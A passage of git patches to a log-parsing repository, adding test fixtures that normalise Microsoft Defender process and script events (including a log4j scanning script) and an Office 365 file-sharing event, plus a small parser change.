\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "process"
+      ],
+      "dataset": "device_process_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-22T15:09:44.594155Z",
+    "action": {
+      "properties": {
+        "InitiatingProcessLogonId": "0",
+        "LogonId": "0"
+      },
+      "type": "ProcessCreated"
+    },
+    "file": {
+      "directory": "/usr/bin/ps",
+      "hash": {
+        "md5": "098f6bcd4621d373cade4e832627b4f6",
+        "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3",
+        "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
+      },
+      "name": "ps",
+      "size": 144632
+    },
+    "host": {
+      "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca",
+      "name": "computer.intranet.example"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "67417"
+        }
+      }
+    },
+    "process": {
+      "args": [
+        "--no-headers",
+        "-A",
+        "-o",
+        "comm,pid,pcpu,pmem,rss,etimes"
+      ],
+      "code_signature": {
+        "status": "Unknown",
+        "subject_name": "Unknown"
+      },
+      "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers",
+      "parent": {
+        "pid": 0
+      },
+      "pid": 423627,
+      "start": "2024-10-22T15:09:44.594155Z",
+      "user": {
+        "domain": "computer",
+        "name": "root"
+      }
+    },
+    "related": {
+      "hash": [
+        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
+        "098f6bcd4621d373cade4e832627b4f6",
+        "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
+      ],
+      "user": [
+        "root"
+      ]
+    },
+    "user": {
+      "domain": "computer",
+      "name": "root"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
new file mode 100644
index 000000000..a04e0e8be
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -0,0 +1,52 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-22T15:10:32.7309209Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:55.6358865Z\", \"properties\": {\"DeviceId\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 67420, \"InitiatingProcessId\": 423638, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:47.165481Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024  # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n    for i, item in enumerate(l):\\\\n        if i > n:\\\\n            break\\\\n        yield item\\\\n\\\\nclass Jar:\\\\n    def __init__(self, path):\\\\n        self.path = path\\\\n        self._manifest = {}\\\\n        self._dirlist = []\\\\n\\\\n    def _parse_manifest(self, lines):\\\\n        version_indication = \\\\\\\"version=\\\\\\\"\\\\n        version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n        if len(version_lines) > 0:\\\\n            version = version_lines[0][len(version_indication):]\\\\n            yield 'Version', version.strip()\\\\n\\\\n        field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n        for line in lines:\\\\n            if any(line.startswith(field_name) for field_name in field_names):\\\\n                    key, value = line.split(':')\\\\n                    yield key.strip(), value.strip()\\\\n\\\\n    def _open(self):\\\\n        if not zipfile.is_zipfile(self.path):\\\\n            raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n        return zipfile.ZipFile(self.path)\\\\n\\\\n    def _read_dirlist(self):\\\\n        with self._open() as zf:\\\\n            filenames = dict(p for p in zf.namelist())\\\\n            return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n    def _get_manifest_path(self, zf):\\\\n        for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n            if path in zf.namelist():\\\\n                return path\\\\n\\\\n    def _read_manifest(self, throw_on_error=False):\\\\n        try:\\\\n            with self._open() as zf:\\\\n                manifest_path = self._get_manifest_path(zf)\\\\n                if not manifest_path:\\\\n                    # Not found manifest file\\\\n                    return {}\\\\n\\\\n                manifest_info = zf.getinfo(manifest_path)\\\\n                if manifest_info.file_size > MAX_FILE_SIZE:\\\\n                    raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n                with zf.open(manifest_path) as f:\\\\n                    readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n                    manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n                    manifest = self._parse_manifest(manifest_lines)\\\\n                    return dict((k, v) for k, v in manifest\\\\n                            if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n        except:\\\\n            sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n            if throw_on_error:\\\\n                raise\\\\n\\\\n            return {}\\\\n\\\\n    def manifest(self, throw_on_error=False):\\\\n        if not self._manifest:\\\\n            self._manifest = self._read_manifest(throw_on_error)\\\\n        return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:47.246794Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-22T15:10:32.7309209Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:55.6358865Z\", \"properties\": {\"DeviceId\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 67420, \"InitiatingProcessId\": 423638, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:47.165481Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024  # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n    for i, item in enumerate(l):\\\\n        if i > n:\\\\n            break\\\\n        yield item\\\\n\\\\nclass Jar:\\\\n    def __init__(self, path):\\\\n        self.path = path\\\\n        self._manifest = {}\\\\n        self._dirlist = []\\\\n\\\\n    def _parse_manifest(self, lines):\\\\n        version_indication = \\\\\\\"version=\\\\\\\"\\\\n        version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n        if len(version_lines) > 0:\\\\n            version = version_lines[0][len(version_indication):]\\\\n            yield 'Version', version.strip()\\\\n\\\\n        field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n        for line in lines:\\\\n            if any(line.startswith(field_name) for field_name in field_names):\\\\n                    key, value = line.split(':')\\\\n                    yield key.strip(), value.strip()\\\\n\\\\n    def _open(self):\\\\n        if not zipfile.is_zipfile(self.path):\\\\n            raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n        return zipfile.ZipFile(self.path)\\\\n\\\\n    def _read_dirlist(self):\\\\n        with self._open() as zf:\\\\n            filenames = dict(p for p in zf.namelist())\\\\n            return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n    def _get_manifest_path(self, zf):\\\\n        for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n            if path in zf.namelist():\\\\n                return path\\\\n\\\\n    def _read_manifest(self, throw_on_error=False):\\\\n        try:\\\\n            with self._open() as zf:\\\\n                manifest_path = self._get_manifest_path(zf)\\\\n                if not manifest_path:\\\\n                    # Not found manifest file\\\\n                    return {}\\\\n\\\\n                manifest_info = zf.getinfo(manifest_path)\\\\n                if manifest_info.file_size > MAX_FILE_SIZE:\\\\n                    raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n                with zf.open(manifest_path) as f:\\\\n                    readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n                    manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n                    manifest = self._parse_manifest(manifest_lines)\\\\n                    return dict((k, v) for k, v in manifest\\\\n                            if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n        except:\\\\n            sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n            if throw_on_error:\\\\n                raise\\\\n\\\\n            return {}\\\\n\\\\n    def manifest(self, throw_on_error=False):\\\\n        if not self._manifest:\\\\n            self._manifest = self._read_manifest(throw_on_error)\\\\n        return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:47.246794Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "device_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-22T15:09:47.246794Z",
+    "action": {
+      "properties": {
+        "InitiatingProcessLogonId": "0"
+      },
+      "type": "ScriptContent"
+    },
+    "file": {
+      "hash": {
+        "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
+      }
+    },
+    "host": {
+      "id": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3",
+      "name": "computer.intranet.example"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "67420"
+        }
+      }
+    },
+    "process": {
+      "parent": {
+        "pid": 0
+      },
+      "pid": 423638,
+      "start": "2024-10-22T15:09:47.165481Z"
+    },
+    "related": {
+      "hash": [
+        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
+      ]
+    }
+  }
+}
\ No newline at end of file

From 888b0691245519b5dcea6193ef6658dab8951dd7 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 29 Oct 2024 07:58:50 +0200
Subject: [PATCH 172/317] Fix linting

---
 .../tests/test_device_process_events_2.json                     | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index 808ffdbdb..d2e83b32a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -66,8 +66,8 @@
     },
     "related": {
       "hash": [
-        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
         "098f6bcd4621d373cade4e832627b4f6",
+        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
         "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
       ],
       "user": [

From e38ca0a3e5a0260e038c2cf5fd7601135c6f317f Mon Sep 17 00:00:00 2001
From: rombernier <romain.bernier@sekoia.io>
Date: Tue, 29 Oct 2024 09:07:02 +0100
Subject: [PATCH 173/317] add target user name

---
 Office 365/o365/ingest/parser.yml         |   1 +
 Office 365/o365/tests/source_log.json     |   5 +-
 Office 365/o365/tests/targetusername.json | 114 ++++++++++++++++++++++
 3 files changed, 119 insertions(+), 1 deletion(-)
 create mode 100644 Office 365/o365/tests/targetusername.json

diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 90f07c4ca..c3239441a 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -78,6 +78,7 @@ stages:
           organization.id: "{{json_event.message.OrganizationId}}"
           action.id: "{{json_event.message.RecordType}}"
           action.name: "{{json_event.message.Operation}}"
+          user.target.name: "{{json_event.message.TargetUserOrGroupName}}"
       - set:
           source.ip: "{{parse_client_ip.result.ip}}"
           source.port: "{{parse_client_ip.result.port}}"
diff --git a/Office 365/o365/tests/source_log.json b/Office 365/o365/tests/source_log.json
index ee2d5e8d7..95ecbad6c 100644
--- a/Office 365/o365/tests/source_log.json	
+++ b/Office 365/o365/tests/source_log.json	
@@ -77,7 +77,10 @@
     "user": {
       "email": "user@test.io",
       "id": "i:0h.f|membership|xxxxxx@test.com",
-      "name": "user@test.io"
+      "name": "user@test.io",
+      "target": {
+        "name": "user@test.io"
+      }
     },
     "user_agent": {
       "device": {
diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json
new file mode 100644
index 000000000..b32a0baa4
--- /dev/null
+++ b/Office 365/o365/tests/targetusername.json	
@@ -0,0 +1,114 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 / Office 365",
+        "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
+      }
+    },
+    "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"<Type>Edit</Type><MembersCanShareApplied>False</MembersCanShareApplied>\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}"
+  },
+  "expected": {
